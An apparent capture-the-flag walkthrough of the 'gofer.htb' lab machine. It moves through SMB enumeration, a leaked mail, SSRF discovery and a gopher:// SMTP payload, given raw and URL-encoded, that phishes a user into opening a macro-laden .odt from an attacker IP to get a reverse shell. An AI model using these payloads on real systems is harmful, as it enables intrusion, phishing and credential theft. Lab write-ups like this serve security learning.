Hello Today we will hack this website
we start with a nmap scan. We found out that there were 8 ports open.Since, there is an smb port open, let’s dig in whatever is inside there with the help of smbmap.
A share named “shares” can be accessed with a null session. On connecting to the share, a .backup directory was found which had a mail named file in it.
And downloaded the mail file.
Upon reading the content of the mail, it is found that a user named Jocelyn is susceptible to a phishing attack and has habit of clicking on links. Also, now the important documents would be sent internally by mail and would be using .odt format for documents. Also, it has a web proxy and is less restrictive.
Upon visiting the ip it was found to be redirecting to gofer.htb. Hence was added to /etc/hosts. Then upon visiting the website, there was nothing peculiar that we could be fond of. So, tried to search for a sub-domain and found one named proxy as suggested in the mail which was also added to the /etc/hosts file.
But visiting the site, it greets with a login page. Also trying some common words to login didn’t work out.
Upon testing common directories and files only index.php returned positive. Upon verb tampering, it resulted on giving up different result stating “Missing URL parameter !”.
So, as stated earlier in the mail, it might be a SSRF. And could prove that it definitely is.
SMB → Mail Crafting
So, as found in the earlier mail, we could access the internal mail server through this vulnerability and get the RCE. But first we need to craft a .odt exploit and send through mail to Jocelyn Hudson (username jhudson as seen in the mail and user naming convention) and from the website .
Based on the response of the box as well as the box name, it could be assumed that a gopher:// protocol is used to send files to other users.
The following github repo could help us create the payload that is required.
GitHub - tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various servers
This tool generates gopher link for exploiting SSRF and gaining RCE in various servers - GitHub - tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various ...
github.com
The final piece in the puzzle was to register ‘Enter’ key in the application and which could be achieved through \r\n.
Our payload:
gopher://2130706433:25/xHELO \r\n
MAIL FROM:<smaharjan@**********.com> \r\n
RCPT TO:<jhudson@**********.com> \r\n
DATA \r\n
From: <smaharjan@**********.com> \r\n
To: <jhudson@**********.com> \r\n
Subject: TestingTesting \r\n
\r\n
<a href='http://10.10.16.6/test.odt>hello</a> \r\n
. \r\n
QUIT \r\n
The following is the final payload for the execution.
gopher://2130706433:25/xHELO%250d%250aMAIL%20FROM%3A%3Csmaharjan@******.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%3Csmaharjan@gofer.htb%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250a%250d%250aSubject%3A%20TestingTesting%250d%250a%250d%250a<a+href%3d'http%3a//10.10.16.6/test.odt>hello</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
Upon sending the request, the response OK was received.
Document → RCE
For creating the malicious .odt file, it could be achieved through macro as it would execute certain functions, codes within it upon running the file.
The following macro was created inside the file.
Then the vulnerability was triggered which requested for the file and got the reverse-shell.
jhudson →tbuckley
Upon looking at the processes running inside the machine, found the credentials for user tbuckley being passed.
— snip —
Successfully logged on the user tbuckley.
That's all. We hacked the site and now we own the root access !
You can contact me if you have any question
***********************************************************************************************************************************************
**********************************************************************************************************************************************
Last edited: